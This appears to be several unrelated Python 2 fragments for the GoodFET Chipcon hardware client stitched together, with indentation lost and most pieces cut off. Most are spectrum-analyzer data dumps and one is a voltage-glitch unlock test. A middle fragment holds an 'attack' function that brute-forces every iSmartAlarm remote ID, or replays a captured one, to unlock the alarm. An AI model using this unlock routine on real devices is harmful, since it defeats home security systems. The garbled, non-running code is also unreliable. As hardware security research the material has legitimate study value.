# ------------------------------------------------------------------------------
# | Marker | MSB Loop | LSB Loop | channel | channel | ... | channel | channel |
# | 0xFE | Count | Count | number | rssi | ... | number | rssi |
# ------------------------------------------------------------------------------
import sys;
import Gnuplot as plt
# sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/')
from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;
client=GoodFETCC();
client.serInit();
client.setup();
client.start();
client.CChaltcpu();
client.CCreleasecpu();
time.sleep(1);
chanstart=0xf000;
#maxchan=132;
maxchan=53;
round=0;
g = plt.Gnuplot()
# GoodFET Chipcon Example
#
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
import sys;
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;
client=GoodFETCC();
client.serInit();
client.setup();
client.start();
bytescount=8*132;
bytestart=0xf000;
while 1:
time.sleep(1);
client.CChaltcpu();
dump="";
for foo in range(0,bytescount):
dump=("%s %02x" % (dump,client.CCpeekdatabyte(bytestart+foo)));
# GoodFET Chipcon Example
#
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
import sys
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time
client = GoodFETCC()
client.serInit()
client.setup()
client.start()
client.CChaltcpu()
client.CCreleasecpu()
time.sleep(1)
bytestart = 0xf800
maxchan = 132
round = 0
print "time freq rssi"
# sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time
# Sleep Intervals in Seconds
sshsi = 1 # one second
shsi = 10 # 10 seconds
mdsi = 60 # 1 minute
lgsi = 120 # 2 minutes
xlgsi = 1200 # 20 minutes
client = GoodFETCC()
client.serInit()
client.setup()
client.start()
# Start and stop if previously something failed
client.CChaltcpu()
client.CCreleasecpu()
# Map channel number to approximate frequency
# 0 == 902 thru 52 == 928 with a step of .5 MHz
max_chan = 53
# however 0 IS included, so 53
chan_dict = dict([(x, ((x * .5) + 902)) for x in range(max_chan)])
# GoodFET Chipcon Example
#
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#
# This code is being rewritten and refactored. You've been warned!
import sys;
import binascii;
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
client=GoodFETCC();
client.serInit();
client.setup();
client.start();
bytecount=0;
lastcount=0;
bytescount=64;
bytestart=0x0C;
bytes=[];
f="random.bin"; #sys.argv[1];
file = open(f, mode='wb')
def attack(attack_type):
try:
global ser
global args
byte = '1'
#Initialize GoodFET serial port connection
client = GoodFETCC()
client.serInit()
# Connect to GoodFET
client.setup()
# Initialize GoodFET client multiple times, this is due to poor JTAG latching
client.start()
client.start()
client.start()
client.start()
# Open serial pipe to Arduino
ser = serial.Serial(args.port, 9600, timeout=0)
if attack_type == '0':
clearscreen()
id = 'FFFFFFFFFFFFFF0000000000070000FF'
bytes = bytearray.fromhex(id)
counter = 0 #38520
while True:
if counter == 65535:
break
counter += 1
bytes[13:15] = unhexlify(offset(counter))
f = StringIO(data(32752, bytes) + '\n:00000001FF')
print pink("IHEX:\n" + f.getvalue() + '\n')
client.flash(f)
f.close()
client.stop()
sleep(2.5)
serialpoke(byte)
sleep(0.6)
client.start()
print green(
"[SUCCESS] All 65536 ID's have been exhausted, good day.")
exit_clean()
else:
global src_id
print green(
"[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n"
)
id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF'
bytes = bytearray.fromhex(id)
if attack_type == '2':
raw_input('Press [ENTER] when ready to unlock:')
else:
print yellowbold(
"[INFO] Delay mode enabled. Waiting %i seconds till unlock"
% args.delay)
sleep(args.delay)
f = StringIO(data(32752, bytes) + '\n:00000001FF')
print pink("IHEX:\n" + f.getvalue() + '\n')
client.flash(f)
f.close()
client.stop()
sleep(2.5)
serialpoke(byte)
sleep(0.6)
print green("[SUCCESS] Hopefully unlocked :D")
exit_clean()
except Exception, e:
print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e)
exit_clean()
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
#
#
#
import sys
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time
client = GoodFETCC()
client.serInit()
client.setup()
client.start()
client.CChaltcpu()
client.CCreleasecpu()
time.sleep(1)
bytestart = 0xf000
bytescount = 8 * 132
maxchan = 132
round = 0
print "time freq rssi rssimax"
import sys,binascii,time,random;
sys.path.append('../../../trunk/client/')
from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import sqlite3;
#Database connection and tables.
db=sqlite3.connect("glitch.db");
db.execute("create table if not exists glitches(time,vcc,gnd,trials,glitchcount,count)");
#Initialize FET and set baud rate
client=GoodFETCC();
client.serInit()
print "-- GoodFET EEPROM Unlock test."
print "-- Count of reads with voltage glitch."
client.start();
client.erase();
secret=0x69;
#Erase chip for baseline.
while(client.CCpeekcodebyte(0)!=secret):
print "-- Setting secret";
client.start();
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
#
#
#
import sys;
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;
client=GoodFETCC();
client.serInit();
client.setup();
client.start();
client.CChaltcpu();
client.CCreleasecpu();
time.sleep(1);
bytestart=0xf000;
bytescount=8*132
maxchan=132;
round=0;
print "time freq rssi rssimax";
